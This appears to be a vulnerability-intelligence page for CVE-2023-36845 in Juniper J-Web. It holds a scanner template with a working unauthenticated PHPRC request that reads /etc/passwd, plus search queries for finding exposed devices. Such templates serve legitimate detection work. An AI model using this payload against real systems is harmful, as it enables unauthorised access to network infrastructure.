Juniper J-Web - Remote Code Execution CVE-2023-36845 - Critical vulnerability allowing unauthenticated remote command executio
Reporter | Title | Published | Views | Family All 57 |
---|---|---|---|---|
![]() | CVE-2023-36845 | 17 Aug 202300:00 | – | attackerkb |
![]() | CVE-2023-36844 | 17 Aug 202300:00 | – | attackerkb |
![]() | Junos OS PHPRC Environment Variable Manipulation RCE | 20 Sep 202320:47 | – | metasploit |
![]() | Juniper SRX Firewall / EX Switch Remote Code Execution Exploit | 2 Oct 202300:00 | – | zdt |
![]() | Juniper SRX Firewalls&EX switches - PreAuth Remote Code Execution Exploit | 5 Feb 202400:00 | – | zdt |
![]() | Juniper SRX Firewall / EX Switch Remote Code Execution | 2 Oct 202300:00 | – | packetstorm |
![]() | Juniper SRX Firewall / EX Switch Remote Code Execution | 2 Feb 202400:00 | – | packetstorm |
![]() | New Juniper Junos OS Flaws Expose Devices to Remote Attacks - Patch Now | 19 Aug 202307:38 | – | thn |
![]() | Nearly 12,000 Juniper Firewalls Found Vulnerable to Recently Disclosed RCE Vulnerability | 19 Sep 202309:30 | – | thn |
![]() | CISA Sets a Deadline - Patch Juniper Junos OS Flaws Before November 17 | 14 Nov 202306:03 | – | thn |
id: CVE-2023-36845
info:
name: Juniper J-Web - Remote Code Execution
author: yaser_s
severity: critical
description: |
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
reference:
- https://vulncheck.com/blog/juniper-cve-2023-36845
- https://nvd.nist.gov/vuln/detail/CVE-2023-36845
- https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
- http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html
- https://supportportal.juniper.net/JSA72300
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-36845
cwe-id: CWE-473
epss-score: 0.96663
epss-percentile: 0.99636
cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: juniper
product: junos
shodan-query:
- title:"Juniper Web Device Manager"
- http.title:"juniper web device manager"
fofa-query: title="juniper web device manager"
google-query: intitle:"juniper web device manager"
tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev
http:
- raw:
- |
POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
auto_prepend_file="/etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "Juniper"
- type: status
status:
- 200
# digest: 490a0046304402200e3d2523a6555e2516390de8929c0d7c68bc8df38d40827bd13e05b8a7ea7b5902204bc0b56e53d3fdcdf05cbe2090bb8d8488051cda63d1db73f0de175991f625b2:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo